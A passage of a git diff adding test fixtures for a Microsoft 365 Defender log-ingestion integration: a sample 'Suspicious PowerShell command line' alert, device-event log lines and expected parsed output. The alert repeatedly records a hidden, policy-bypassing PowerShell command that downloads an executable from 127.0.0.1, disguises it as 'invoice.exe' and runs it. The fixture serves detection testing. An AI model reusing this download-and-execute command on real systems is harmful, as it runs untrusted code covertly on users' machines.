@@ -0,0 +1,291 @@ +{ + "@timestamp": "2023-10-20T09:54:07.503Z", + "agent": { + "ephemeral_id": "3e24a8f6-11a3-415f-b6d6-c5188d9239f6", + "id": "26c7b361-0790-47aa-b465-a57c5d8ab6b8", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.7.1" + }, + "cloud": { + "account": { + "id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39" + } + }, + "data_stream": { + "dataset": "m365_defender.alert", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "26c7b361-0790-47aa-b465-a57c5d8ab6b8", + "snapshot": false, + "version": "8.7.1" + }, + "event": { + "action": [ + "detected" + ], + "agent_id_status": "verified", + "category": [ + "host", + "iam", + "network", + "process" + ], + "created": "2023-10-20T09:53:09.883Z", + "dataset": "m365_defender.alert", + "duration": 2478000000, + "end": "2023-10-20T09:51:41.993Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "ingested": "2024-01-29T06:22:16Z", + "kind": "alert", + "original": "{\"actorDisplayName\":null,\"additionalData\":null,\"alertPolicyId\":null,\"alertWebUrl\":\"https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"assignedTo\":null,\"category\":\"Execution\",\"classification\":null,\"comments\":[],\"createdDateTime\":\"2023-10-20T09:53:09.8839373Z\",\"description\":\"A suspicious PowerShell activity was observed on the machine. \\nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. 
Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.\",\"detectionSource\":\"microsoftDefenderForEndpoint\",\"detectorId\":\"7f1c3609-a3ff-40e2-995b-c01770161d68\",\"determination\":null,\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"azureAdDeviceId\":\"f18bd540-d5e4-46e0-8ddd-3d03a59e4e14\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"defenderAvStatus\":\"notSupported\",\"detailedRoles\":[\"PrimaryDevice\"],\"deviceDnsName\":\"clw555test\",\"firstSeenDateTime\":\"2023-10-20T09:50:17.7383987Z\",\"healthStatus\":\"inactive\",\"ipInterfaces\":[\"192.168.5.65\",\"fe80::cfe4:80b:615c:38fb\",\"127.0.0.1\",\"::1\"],\"loggedOnUsers\":[{\"accountName\":\"CDPUserIS-38411\",\"domainName\":\"AzureAD\"}],\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"onboardingStatus\":\"onboarded\",\"osBuild\":22621,\"osPlatform\":\"Windows11\",\"rbacGroupId\":0,\"rbacGroupName\":null,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"riskScore\":\"high\",\"roles\":[],\"tags\":[],\"verdict\":\"unknown\",\"version\":\"22H2\",\"vmMetadata\":null},{\"@odata.type\":\"#microsoft.graph.security.userEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"azureAdUserId\":null,\"displayName\":null,\"domainName\":\"AzureAD\",\"userPrincipalName\":null,\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\"},\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.urlEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"url\":\"http://127.0.0.1/1.exe\",\"verdict\":\"suspicious\"},{\"@odata.type\":\"#microsoft.g
raph.security.ipEvidence\",\"countryLetterCode\":null,\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"ipAddress\":\"127.0.0.1\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"suspicious\"},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"detectionStatus\":\"detected\",\"imageFile\":{\"fileName\":\"powershell.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":491520,\"issuer\":null,\"sha1\":\"a72c41316307889e43fe8605a0dca4a72e72a011\",\"sha256\":\"d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80\",\"signer\":null},\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"parentProcessCreationDateTime\":\"2023-10-20T09:51:19.5064237Z\",\"parentProcessId\":5772,\"parentProcessImageFile\":{\"fileName\":\"cmd.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":323584,\"issuer\":null,\"sha1\":null,\"sha256\":null,\"signer\":null},\"processCommandLine\":\"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe');Start-Process 
'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe'\",\"processCreationDateTime\":\"2023-10-20T09:51:39.4997961Z\",\"processId\":8224,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"azureAdUserId\":null,\"displayName\":null,\"domainName\":\"AzureAD\",\"userPrincipalName\":null,\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\"},\"verdict\":\"unknown\"}],\"firstActivityDateTime\":\"2023-10-20T09:51:39.5154802Z\",\"id\":\"daefa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"incidentId\":\"23\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"lastActivityDateTime\":\"2023-10-20T09:51:41.9939003Z\",\"lastUpdateDateTime\":\"2023-10-20T09:54:07.5033333Z\",\"mitreTechniques\":[\"T1059.001\"],\"productName\":\"Microsoft Defender for Endpoint\",\"providerAlertId\":\"efa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"recommendedActions\":\"1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\\n2. Search the script for more indicators to investigate - for example IP addresses (potential C\\u0026C servers), target computers etc.\\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\\n4. Look for the process that invoked this PowerShell run and their origin. 
Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.\",\"resolvedDateTime\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"severity\":\"medium\",\"status\":\"new\",\"tenantId\":\"3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"threatDisplayName\":null,\"threatFamilyName\":null,\"title\":\"Suspicious PowerShell command line\"}", + "provider": "microsoftDefenderForEndpoint", + "severity": 3, + "start": "2023-10-20T09:51:39.515Z", + "type": [ + "info" + ], + "url": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39" + }, + "host": { + "id": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843" + ], + "ip": [ + "127.0.0.1" + ], + "os": { + "name": [ + "Windows11" + ], + "version": [ + "22H2" + ] + } + }, + "input": { + "type": "httpjson" + }, + "m365_defender": { + "alert": { + "category": "Execution", + "created_datetime": "2023-10-20T09:53:09.883Z", + "description": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. 
Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "detection_source": "microsoftDefenderForEndpoint", + "detector_id": "7f1c3609-a3ff-40e2-995b-c01770161d68", + "evidence": [ + { + "azure_ad_device_id": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "created_datetime": "2023-10-20T09:53:10.193Z", + "defender_av_status": "notSupported", + "detailed_roles": [ + "PrimaryDevice" + ], + "device_dns_name": "clw555test", + "first_seen_datetime": "2023-10-20T09:50:17.738Z", + "health_status": "inactive", + "ip_interfaces": [ + "192.168.5.65", + "fe80::cfe4:80b:615c:38fb", + "127.0.0.1", + "::1" + ], + "logged_on_users": [ + { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD" + } + ], + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.deviceEvidence", + "onboarding_status": "onboarded", + "os_build": "22621", + "os_platform": "Windows11", + "rbac_group": { + "id": "0" + }, + "remediation_status": "none", + "risk_score": "high", + "verdict": "unknown", + "version": "22H2" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.userEvidence", + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.urlEvidence", + "remediation_status": "none", + "url": "http://127.0.0.1/1.exe", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "ip_address": "127.0.0.1", + "odata_type": "#microsoft.graph.security.ipEvidence", + "remediation_status": "none", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "detection_status": "detected", + 
"image_file": { + "name": "powershell.exe", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "publisher": "Microsoft Corporation", + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "size": 491520 + }, + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.processEvidence", + "parent_process": { + "creation_datetime": "2023-10-20T09:51:19.506Z", + "id": 5772, + "image_file": { + "name": "cmd.exe", + "path": "C:\\Windows\\System32", + "publisher": "Microsoft Corporation", + "size": 323584 + } + }, + "process": { + "command_line": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "creation_datetime": "2023-10-20T09:51:39.499Z", + "id": 8224 + }, + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + } + ], + "first_activity_datetime": "2023-10-20T09:51:39.515Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "incident_id": "23", + "incident_web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/incidents/23", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + }, + "last_activity_datetime": "2023-10-20T09:51:41.993Z", + "last_update_datetime": "2023-10-20T09:54:07.503Z", + "mitre_techniques": [ + "T1059.001" + ], + "provider_alert_id": "efa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "recommended_actions": "1. Examine the PowerShell command line to understand what commands were executed. 
Note: the content may need to be decoded if it is Base64-encoded.\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.", + "service_source": "microsoftDefenderForEndpoint", + "severity": "medium", + "status": "new", + "tenant_id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "Suspicious PowerShell command line", + "web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + } + } + }, + "message": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. 
Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "process": { + "command_line": [ + "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'" + ], + "hash": { + "sha1": [ + "a72c41316307889e43fe8605a0dca4a72e72a011" + ], + "sha256": [ + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ] + }, + "parent": { + "pid": [ + 5772 + ], + "start": [ + "2023-10-20T09:51:19.506Z" + ] + }, + "pid": [ + 8224 + ], + "start": [ + "2023-10-20T09:51:39.499Z" + ], + "user": { + "name": [ + "CDPUserIS-38411" + ] + } + }, + "related": { + "hash": [ + "a72c41316307889e43fe8605a0dca4a72e72a011", + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ], + "hosts": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "Windows11", + "22H2", + "clw555test", + "AzureAD" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "CDPUserIS-38411", + "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "m365_defender-alert" + ], + "threat": { + "tactic": { + "name": [ + "Execution" + ] + }, + "technique": { + "subtechnique": { + "id": [ + "T1059.001" + ] + } + } + }, + "user": { + "domain": [ + "AzureAD" + ], + "name": [ + "CDPUserIS-38411" + ] + } +} \ No newline at end of file diff --git a/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log b/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log index 7ff7c783014..bce3153a453 100644 --- a/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log 
+++ b/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log 
@@ -24,3 +24,5 @@ {"Tenant":"DefaultTenant","category":"AdvancedHunting-DeviceNetworkEvents","operationName":"Publish","properties":{"Timestamp": "2023-07-19T14:09:43.8734771Z","DeviceId": "22bb10ffe3104214b20fc7de339a2b053e915e5c","DeviceName": "janeslaptop1.corporatedomain","ActionType": "SmtpConnectionInspected","RemoteIP": "175.16.199.0","RemotePort": 25,"RemoteUrl":null,"LocalIP": "89.160.20.112","LocalPort": 60697,"Protocol": "Tcp","LocalIPType":null,"RemoteIPType":null,"InitiatingProcessSHA1":null,"InitiatingProcessSHA256":null,"InitiatingProcessMD5":null,"InitiatingProcessFileName":null,"InitiatingProcessFileSize":null,"InitiatingProcessVersionInfoCompanyName":null,"InitiatingProcessVersionInfoProductName":null,"InitiatingProcessVersionInfoProductVersion":null,"InitiatingProcessVersionInfoInternalFileName":null,"InitiatingProcessVersionInfoOriginalFileName":null,"InitiatingProcessVersionInfoFileDescription":null,"InitiatingProcessId": 0,"InitiatingProcessCommandLine":null,"InitiatingProcessCreationTime":null,"InitiatingProcessFolderPath":null,"InitiatingProcessParentFileName":null,"InitiatingProcessParentId": 0,"InitiatingProcessParentCreationTime":null,"InitiatingProcessAccountDomain":null,"InitiatingProcessAccountName":null,"InitiatingProcessAccountSid":null,"InitiatingProcessAccountUpn":null,"InitiatingProcessAccountObjectId":null,"InitiatingProcessIntegrityLevel":null,"InitiatingProcessTokenElevation": "None","ReportId": 18984951960,"AppGuardContainerId":null,"AdditionalFields": { "direction": "Out", "fuids": "[]", "helo": "janeslaptop1.corporatedomain", "last_reply": "220 2.0.0 SMTP server ready", "path": "[\"89.160.20.112\",\"89.160.20.112\"]", "tls": "true", "trans_depth": "1", "uid": "0278e28ff5d8eff6d3"}},"tenantId":"12345af3-bc0e-4f36-b08e-27759e912345","time":"2023-07-19T18:03:34.9948950Z"} {"Tenant":"DefaultTenant","category":"AdvancedHunting-DeviceNetworkEvents","operationName":"Publish","properties":{"Timestamp": 
"2023-07-19T12:12:10.0598052Z","DeviceId": "22bb10ffe3104214b20fc7de339a2b053e915e5c","DeviceName": "janeslaptop1.corporatedomain","ActionType": "FtpConnectionInspected","RemoteIP": "175.16.199.0","RemotePort": 21,"RemoteUrl":null,"LocalIP": "89.160.20.112","LocalPort": 56885,"Protocol": "Tcp","LocalIPType":null,"RemoteIPType":null,"InitiatingProcessSHA1":null,"InitiatingProcessSHA256":null,"InitiatingProcessMD5":null,"InitiatingProcessFileName":null,"InitiatingProcessFileSize":null,"InitiatingProcessVersionInfoCompanyName":null,"InitiatingProcessVersionInfoProductName":null,"InitiatingProcessVersionInfoProductVersion":null,"InitiatingProcessVersionInfoInternalFileName":null,"InitiatingProcessVersionInfoOriginalFileName":null,"InitiatingProcessVersionInfoFileDescription":null,"InitiatingProcessId": 0,"InitiatingProcessCommandLine":null,"InitiatingProcessCreationTime":null,"InitiatingProcessFolderPath":null,"InitiatingProcessParentFileName":null,"InitiatingProcessParentId": 0,"InitiatingProcessParentCreationTime":null,"InitiatingProcessAccountDomain":null,"InitiatingProcessAccountName":null,"InitiatingProcessAccountSid":null,"InitiatingProcessAccountUpn":null,"InitiatingProcessAccountObjectId":null,"InitiatingProcessIntegrityLevel":null,"InitiatingProcessTokenElevation": "None","ReportId": 98498,"AppGuardContainerId":null,"AdditionalFields": { "direction": "Out", "user": "", "reply_msg": "Service ready", "reply_code": "220", "cwd": ".", "command": "", "uid": "603f4dc5c8d46599fd"}},"tenantId":"12345af3-bc0e-4f36-b08e-27759e912345","time":"2023-07-19T18:03:35.9948950Z"} {"Tenant":"DefaultTenant","category":"AdvancedHunting-DeviceProcessEvents","operationName":"Publish","properties":{"Timestamp": "2023-07-19T14:02:19.4882081Z","DeviceId": "22bb10ffe3104214b20fc7de339a2b053e915e5c","DeviceName": "janeslaptop1.corporatedomain","ActionType": "ProcessCreated","FileName": "msedgewebview2.exe","FolderPath": "C:\\Program Files 
(x86)\\Microsoft\\EdgeWebView\\Application\\114.0.1823.79\\msedgewebview2.exe","SHA1": "271eb137d3d8519cb42e5bccd690a3b9a3059f2a","SHA256": "075d1edc11548c9ebf7f238dea9393f26c5b83cd0362aa4cc24b1d8a6ebc6354","MD5": "b21b158fce974aa46125820ce6b42e9d","FileSize": 3653056,"ProcessVersionInfoCompanyName": "Microsoft Corporation","ProcessVersionInfoProductName": "Microsoft Edge WebView2","ProcessVersionInfoProductVersion": "114.0.1732.12","ProcessVersionInfoInternalFileName": "msedgewebview2_exe","ProcessVersionInfoOriginalFileName": "msedgewebview2.exe","ProcessVersionInfoFileDescription": "Microsoft Edge WebView2","ProcessId": 5498762,"ProcessCommandLine": "\"msedgewebview2.exe\" --type=renderer --noerrdialogs --user-data-dir=\"C:\\Users\\JANEBLOGGS\\AppData\\Local\\Microsoft\\Office\\16.0\\Wef\\webview2\\4ee9dcb0-735b-442e-945c-177c665efe6b_ADAL\\2\\EBWebView\" --webview-exe-name=MSOUTLOOK.EXE","ProcessIntegrityLevel": "Low","ProcessTokenElevation": "TokenElevationTypeDefault","ProcessCreationTime": "2023-07-19T14:02:19.4882081Z","AccountDomain": "corporatedomain","AccountName": "janebloggs","AccountSid": "S-1-5-21-57989841-2025429265-839522115-962270","AccountUpn": "janebloggs@corporate.com","AccountObjectId": "4ee9dcb0-735b-442e-945c-177c665efe6b","LogonId": 3654987,"InitiatingProcessAccountDomain": "corporatedomain","InitiatingProcessAccountName": "janebloggs","InitiatingProcessAccountSid": "S-1-5-21-57989841-2025429265-839522115-962270","InitiatingProcessAccountUpn": "janebloggs@corporate.com","InitiatingProcessAccountObjectId": "4ee9dcb0-735b-442e-945c-177c665efe6b","InitiatingProcessLogonId": 3654987,"InitiatingProcessIntegrityLevel": "Medium","InitiatingProcessTokenElevation": "TokenElevationTypeDefault","InitiatingProcessSHA1": "271eb137d3d8519cb42e5bccd690a3b9a3059f2a","InitiatingProcessSHA256": "075d1edc11548c9ebf7f238dea9393f26c5b83cd0362aa4cc24b1d8a6ebc6354","InitiatingProcessMD5": "b21b158fce974aa46125820ce6b42e9d","InitiatingProcessFileName": 
"msedgewebview2.exe","InitiatingProcessFileSize": 5498762,"InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation","InitiatingProcessVersionInfoProductName": "Microsoft Edge WebView2","InitiatingProcessVersionInfoProductVersion": "114.0.1732.12","InitiatingProcessVersionInfoInternalFileName": "msedgewebview2_exe","InitiatingProcessVersionInfoOriginalFileName": "msedgewebview2.exe","InitiatingProcessVersionInfoFileDescription": "Microsoft Edge WebView2","InitiatingProcessId": 65485,"InitiatingProcessCommandLine": "\"msedgewebview2.exe\" --embedded-browser-webview=1 --webview-exe-name=MSOUTLOOK.EXE --webview-exe-version=16.0.15601.20706 --user-data-dir=\"C:\\Users\\USERNAME\\AppData\\Local\\Microsoft\\Office\\16.0\\Wef\\webview2\\1234dcb0-735b-442e-945c-e6c5df94062c_ADAL\\2\\EBWebView\" --noerrdialogs","InitiatingProcessCreationTime":null},"tenantId":"12345af3-bc0e-4f36-b08e-27759e912345","time":"2023-07-19T18:03:21.9948950Z"} +{"Tenant":"DefaultTenant","category":"AdvancedHunting-DeviceNetworkEvents","operationName":"Publish","properties":{"Timestamp": "2023-07-19T14:09:43.8734771Z","DeviceId": "22bb10ffe3104214b20fc7de339a2b053e915e5c","DeviceName": "janeslaptop1.corporatedomain","ActionType": "SmtpConnectionInspected","RemoteIP": "-","RemotePort": 25,"RemoteUrl":null,"LocalIP": "-","LocalPort": 60697,"Protocol": "Tcp","LocalIPType":null,"RemoteIPType":null,"InitiatingProcessSHA1":null,"InitiatingProcessSHA256":null,"InitiatingProcessMD5":null,"InitiatingProcessFileName":null,"InitiatingProcessFileSize":null,"InitiatingProcessVersionInfoCompanyName":null,"InitiatingProcessVersionInfoProductName":null,"InitiatingProcessVersionInfoProductVersion":null,"InitiatingProcessVersionInfoInternalFileName":null,"InitiatingProcessVersionInfoOriginalFileName":null,"InitiatingProcessVersionInfoFileDescription":null,"InitiatingProcessId": 
0,"InitiatingProcessCommandLine":null,"InitiatingProcessCreationTime":null,"InitiatingProcessFolderPath":null,"InitiatingProcessParentFileName":null,"InitiatingProcessParentId": 0,"InitiatingProcessParentCreationTime":null,"InitiatingProcessAccountDomain":null,"InitiatingProcessAccountName":null,"InitiatingProcessAccountSid":null,"InitiatingProcessAccountUpn":null,"InitiatingProcessAccountObjectId":null,"InitiatingProcessIntegrityLevel":null,"InitiatingProcessTokenElevation": "None","ReportId": 18984951960,"AppGuardContainerId":null,"AdditionalFields": { "direction": "Out", "fuids": "[]", "helo": "janeslaptop1.corporatedomain", "last_reply": "220 2.0.0 SMTP server ready", "path": "[\"89.160.20.112\",\"89.160.20.112\"]", "tls": "true", "trans_depth": "1", "uid": "0278e28ff5d8eff6d3"}},"tenantId":"12345af3-bc0e-4f36-b08e-27759e912345","time":"2023-07-19T18:03:34.9948950Z"} +{"Tenant":"DefaultTenant","category":"AdvancedHunting-DeviceInfo","operationName":"Publish","properties":{"AadDeviceId":null,"AdditionalFields":null,"AssetValue":"testvalue","IsInternetFacing":true,"DeviceManualTags":"testtags","DeviceDynamicTags":"testdynamictags","ExposureLevel":"testlevel","SensorHealthState":"somestatus","ExclusionReason":"somereason","IsExcluded":false,"ClientVersion":"10.8210.19041.2006","DeviceCategory":"Endpoint","DeviceId":"999b6fd7c532534ba50b3232fa992c38a2712345","DeviceName":"testmachine6","DeviceSubtype":null,"DeviceType":"Workstation","IsAzureADJoined":false,"JoinType":null,"LoggedOnUsers":"[{\"UserName\":\"administrator1\"}, 
{\"UserName\":\"administrator2\"}]","MachineGroup":"UnassignedGroup","MergedDeviceIds":null,"MergedToDeviceId":null,"Model":null,"OSArchitecture":null,"OSBuild":null,"OSDistribution":null,"OSPlatform":null,"OSVersion":null,"OSVersionInfo":null,"OnboardingStatus":"Onboarded","PublicIP":"-","RegistryDeviceTag":"evaluation","ReportId":12942,"Timestamp":"2022-11-08T05:56:25.8832339Z","Vendor":null},"tenantId":"12345af3-bc0e-4f36-b08e-27759e912345","time":"2022-11-08T06:01:15.8987913Z"} diff --git a/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log-expected.json b/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log-expected.json index d94c774478f..edf9096108c 100644 --- a/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log-expected.json +++ b/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log-expected.json 
@@ -3440,6 +3440,169 @@ "id": "S-1-5-21-57989841-2025429265-839522115-962270", "name": "janebloggs" } + }, + { + "@timestamp": "2023-07-19T14:09:43.873Z", + "destination": { + "port": 25 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "smtpconnectioninspected", + "category": [ + "network" + ], + "kind": "event", + "original": "{\"Tenant\":\"DefaultTenant\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"operationName\":\"Publish\",\"properties\":{\"Timestamp\": \"2023-07-19T14:09:43.8734771Z\",\"DeviceId\": \"22bb10ffe3104214b20fc7de339a2b053e915e5c\",\"DeviceName\": \"janeslaptop1.corporatedomain\",\"ActionType\": \"SmtpConnectionInspected\",\"RemoteIP\": \"-\",\"RemotePort\": 25,\"RemoteUrl\":null,\"LocalIP\": \"-\",\"LocalPort\": 60697,\"Protocol\": \"Tcp\",\"LocalIPType\":null,\"RemoteIPType\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessSHA256\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessId\": 0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessParentId\": 0,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\": \"None\",\"ReportId\": 18984951960,\"AppGuardContainerId\":null,\"AdditionalFields\": { \"direction\": \"Out\", \"fuids\": \"[]\", \"helo\": 
\"janeslaptop1.corporatedomain\", \"last_reply\": \"220 2.0.0 SMTP server ready\", \"path\": \"[\\\"89.160.20.112\\\",\\\"89.160.20.112\\\"]\", \"tls\": \"true\", \"trans_depth\": \"1\", \"uid\": \"0278e28ff5d8eff6d3\"}},\"tenantId\":\"12345af3-bc0e-4f36-b08e-27759e912345\",\"time\":\"2023-07-19T18:03:34.9948950Z\"}" + }, + "host": { + "id": "22bb10ffe3104214b20fc7de339a2b053e915e5c", + "name": "janeslaptop1.corporatedomain" + }, + "m365_defender": { + "event": { + "action": { + "type": "SmtpConnectionInspected" + }, + "additional_fields": { + "fuids": "[]", + "helo": "janeslaptop1.corporatedomain", + "last_reply": "220 2.0.0 SMTP server ready", + "path": "[\"89.160.20.112\",\"89.160.20.112\"]", + "tls": "true", + "trans_depth": "1", + "uid": "0278e28ff5d8eff6d3" + }, + "category": "AdvancedHunting-DeviceNetworkEvents", + "device": { + "id": "22bb10ffe3104214b20fc7de339a2b053e915e5c", + "name": "janeslaptop1.corporatedomain" + }, + "initiating_process": { + "id": 0, + "parent_id": 0, + "token_elevation": "None" + }, + "local": { + "port": 60697 + }, + "network_direction": "Out", + "operation_name": "Publish", + "protocol": "Tcp", + "remote": { + "port": 25 + }, + "report_id": "18984951960", + "tenant": { + "id": "12345af3-bc0e-4f36-b08e-27759e912345", + "name": "DefaultTenant" + }, + "time": "2023-07-19T18:03:34.994Z", + "timestamp": "2023-07-19T14:09:43.873Z" + } + }, + "network": { + "direction": "outbound", + "protocol": "tcp" + }, + "process": { + "parent": { + "pid": 0 + }, + "pid": 0 + }, + "related": { + "hosts": [ + "22bb10ffe3104214b20fc7de339a2b053e915e5c", + "janeslaptop1.corporatedomain" + ] + }, + "source": { + "port": 60697 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2022-11-08T05:56:25.883Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "host" + ], + "kind": 